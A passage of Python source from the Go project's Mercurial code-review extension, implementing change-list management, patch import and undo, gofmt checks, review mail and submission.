if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
clean = hg_matchPattern(ui, repo, *pats, clean=True)
files = []
for f in clx.files:
if f in changed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, op="verb", defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed (use hg %s <number> to use existing CL)" % op
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
for f in hg_matchPattern(ui, repo, p, unknown=True):
promptadd(ui, repo, f)
for f in hg_matchPattern(ui, repo, p, removed=True):
promptremove(ui, repo, f)
files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
for f in files:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not files:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
return ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = gofmt_required(files)
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f) and not re.search(r"\.tab\.[ch]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
#######################################################################
# CONTRIBUTORS file parsing
contributorsCache = None
contributorsURL = None
def ReadContributors(ui, repo):
global contributorsCache
if contributorsCache is not None:
return contributorsCache
try:
if contributorsURL is not None:
opening = contributorsURL
f = urllib2.urlopen(contributorsURL)
else:
opening = repo.root + '/CONTRIBUTORS'
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
ui.write("warning: cannot open %s: %s\n" % (opening, ExceptionDetail()))
return
contributors = {}
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
contributorsCache = contributors
return contributors
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise hg_util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
contributors = ReadContributors(ui, repo)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
hgversion = hg_util.version()
# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"
old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, visit http://mercurial.selenic.com/downloads/.
"""
linux_message = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < hg_required:
msg = old_message
if os.access("/etc/mercurial", 0):
msg += linux_message
raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
def __init__(self, ui):
self.ui = ui
ui.pushbuffer()
self.oldQuiet = ui.quiet
ui.quiet = True
self.oldVerbose = ui.verbose
ui.verbose = False
def output(self):
ui = self.ui
ui.quiet = self.oldQuiet
ui.verbose = self.oldVerbose
return ui.popbuffer()
def to_slash(path):
if sys.platform == "win32":
return path.replace('\\', '/')
return path
def hg_matchPattern(ui, repo, *pats, **opts):
w = uiwrap(ui)
hg_commands.status(ui, repo, *pats, **opts)
text = w.output()
ret = []
prefix = to_slash(os.path.realpath(repo.root))+'/'
for line in text.split('\n'):
f = line.split()
if len(f) > 1:
if len(pats) > 0:
# Given patterns, Mercurial shows relative to cwd
p = to_slash(os.path.realpath(f[1]))
if not p.startswith(prefix):
print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
else:
ret.append(p[len(prefix):])
else:
# Without patterns, Mercurial shows relative to root (what we want)
ret.append(to_slash(f[1]))
return ret
def hg_heads(ui, repo):
w = uiwrap(ui)
hg_commands.heads(ui, repo)
return w.output()
noise = [
"",
"resolving manifests",
"searching for changes",
"couldn't find merge tool hgmerge",
"adding changesets",
"adding manifests",
"adding file changes",
"all local heads known remotely",
]
def isNoise(line):
line = str(line)
for x in noise:
if line == x:
return True
return False
def hg_incoming(ui, repo):
w = uiwrap(ui)
ret = hg_commands.incoming(ui, repo, force=False, bundle="")
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_log(ui, repo, **opts):
for k in ['date', 'keyword', 'rev', 'user']:
if not opts.has_key(k):
opts[k] = ""
w = uiwrap(ui)
ret = hg_commands.log(ui, repo, **opts)
if ret:
raise hg_util.Abort(ret)
return w.output()
def hg_outgoing(ui, repo, **opts):
w = uiwrap(ui)
ret = hg_commands.outgoing(ui, repo, **opts)
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_pull(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True # for file list
err = hg_commands.pull(ui, repo, **opts)
for line in w.output().split('\n'):
if isNoise(line):
continue
if line.startswith('moving '):
line = 'mv ' + line[len('moving '):]
if line.startswith('getting ') and line.find(' to ') >= 0:
line = 'mv ' + line[len('getting '):]
if line.startswith('getting '):
line = '+ ' + line[len('getting '):]
if line.startswith('removing '):
line = '- ' + line[len('removing '):]
ui.write(line + '\n')
return err
def hg_push(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True
err = hg_commands.push(ui, repo, **opts)
for line in w.output().split('\n'):
if not isNoise(line):
ui.write(line + '\n')
return err
def hg_commit(ui, repo, *pats, **opts):
return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
commit_okay = False
def precommithook(ui, repo, **opts):
if commit_okay:
return False # False means okay.
ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
global match_repo
global match_ui
global match_orig
match_ui = ui
match_repo = repo
from mercurial import scmutil
match_orig = scmutil.match
scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if clname == "default":
files = DefaultFiles(match_ui, match_repo, [])
else:
if not GoodCLName(clname):
raise hg_util.Abort("invalid CL name " + clname)
cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
if err != '':
raise hg_util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise hg_util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
# work-around for http://selenic.com/hg/rev/785bbc8634f8
if not hasattr(ctx, 'match'):
ctx = ctx[None]
return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
def hgcommand(f):
return f
#######################################################################
# hg change
@hgcommand
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
raise hg_util.Abort("cannot specify CL name and file patterns")
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
raise hg_util.Abort(err)
if not cl.local and (opts["stdin"] or not opts["stdout"]):
raise hg_util.Abort("cannot change non-local CL " + name)
else:
name = "new"
cl = CL("new")
if repo[None].branch() != "default":
raise hg_util.Abort("cannot create CL outside default branch; switch with 'hg update default'")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
raise hg_util.Abort("cannot use -d and -D together")
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
raise hg_util.Abort("cannot use "+flag+" with file patterns")
if opts["stdin"] or opts["stdout"]:
raise hg_util.Abort("cannot use "+flag+" with -i or -o")
if not cl.local:
raise hg_util.Abort("cannot change non-local CL " + name)
if opts["delete"]:
if cl.copied_from:
raise hg_util.Abort("original author must delete CL; hg change -D will remove locally")
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
raise hg_util.Abort("error parsing change list: line %d: %s" % (line, err))
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
raise hg_util.Abort(err)
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
#######################################################################
# hg code-login (broken?)
@hgcommand
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
@hgcommand
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
raise hg_util.Abort("cannot run hg clpatch outside default branch")
err = clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
if err:
raise hg_util.Abort(err)
@hgcommand
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
raise hg_util.Abort("cannot run hg undo outside default branch")
err = clpatch_or_undo(ui, repo, clname, opts, mode="undo")
if err:
raise hg_util.Abort(err)
@hgcommand
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
raise hg_util.Abort("no active release branches")
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise hg_util.Abort("uncommitted local changes - cannot switch branches")
err = hg_clean(repo, releaseBranch)
if err:
raise hg_util.Abort(err)
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise hg_util.Abort(err)
except Exception, e:
hg_clean(repo, "default")
raise e
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^https?://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if codereview_disabled:
return codereview_disabled
if mode == "undo" or mode == "backport":
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
found = False
for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
rev = repo[r]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = hg_node.short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = hg_node.short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([hg_node.short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgapplydiff_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgapplydiff"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgapplydiff: " + ExceptionDetail() + "\nInstall hgapplydiff with:\n$ go get code.google.com/p/go.codereview/cmd/hgapplydiff\n"
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgapplydiff_failure"]:
return "hgapplydiff failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgapplydiff_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [])
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
@hgcommand
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
#######################################################################
# hg file
@hgcommand
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
#######################################################################
# hg gofmt
@hgcommand
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
files = ChangedExistingFiles(ui, repo, pats, opts)
files = gofmt_required(files)
if not files:
ui.status("no modified go files\n")
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if subprocess.call(cmd + files) != 0:
raise hg_util.Abort("gofmt did not exit cleanly")
except hg_error.Abort, e:
raise
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
return
def gofmt_required(files):
return [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
#######################################################################
# hg mail
@hgcommand
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
cl, err = CommandLineCL(ui, repo, pats, opts, op="mail", defaultcc=defaultcc)
if err != "":
raise hg_util.Abort(err)
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
raise hg_util.Abort("no reviewers listed in CL")
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
raise hg_util.Abort("no changed files, not sending mail")
cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
@hgcommand
def ps(ui, repo, *pats, **opts):
"""alias for hg p --short
"""
opts['short'] = True
return pending(ui, repo, *pats, **opts)
@hgcommand
def pq(ui, repo, *pats, **opts):
"""alias for hg p --quick
"""
opts['quick'] = True
return pending(ui, repo, *pats, **opts)
@hgcommand
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
quick = opts.get('quick', False)
short = opts.get('short', False)
m = LoadAllCL(ui, repo, web=not quick and not short)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
if short:
ui.write(name + "\t" + line1(cl.desc) + "\n")
else:
ui.write(cl.PendingText(quick=quick) + "\n")
if short:
return 0
files = DefaultFiles(ui, repo, [])
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
#######################################################################
# hg submit
def need_sync():
raise hg_util.Abort("local repository out of date; must sync before submit")
@hgcommand
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
if not opts["no_incoming"] and hg_incoming(ui, repo):
need_sync()
cl, err = CommandLineCL(ui, repo, pats, opts, op="submit", defaultcc=defaultcc)
if err != "":
raise hg_util.Abort(err)
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
raise hg_util.Abort("no reviewers listed in CL")
if not cl.local:
raise hg_util.Abort("cannot submit non-local CL")
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
message = cl.desc.rstrip() + "\n\n" + about
typecheck(message, str)
set_status("pushing " + cl.name + " to remote server")
if hg_outgoing(ui, repo):
raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
old_heads = len(hg_heads(ui, repo).split())
global commit_okay
commit_okay = True
ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
commit_okay = False
if ret:
raise hg_util.Abort("nothing changed")
node = repo["-1"].node()
# push to remote; if it fails for any reason, roll back
try:
new_heads = len(hg_heads(ui, repo).split())
if old_heads != new_heads and not (old_heads == 0 and new_heads == 1):
# Created new head, so we weren't up to date.
need_sync()
# Push changes to remote. If it works, we're committed. If not, roll back.
try:
if hg_push(ui, repo):
raise hg_util.Abort("push error")
except hg_error.Abort, e:
if e.message.find("push creates new heads") >= 0:
# Remote repository had changes we missed.
need_sync()
raise
except urllib2.HTTPError, e:
print >>sys.stderr, "pushing to remote server failed; do you have commit permissions?"
raise
except:
real_rollback()
raise
# We're committed. Upload final patch, close review, add commit message.
changeURL = hg_node.short(node)
url = ui.expandpath("default")
m = re.match("(^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?)" + "|" +
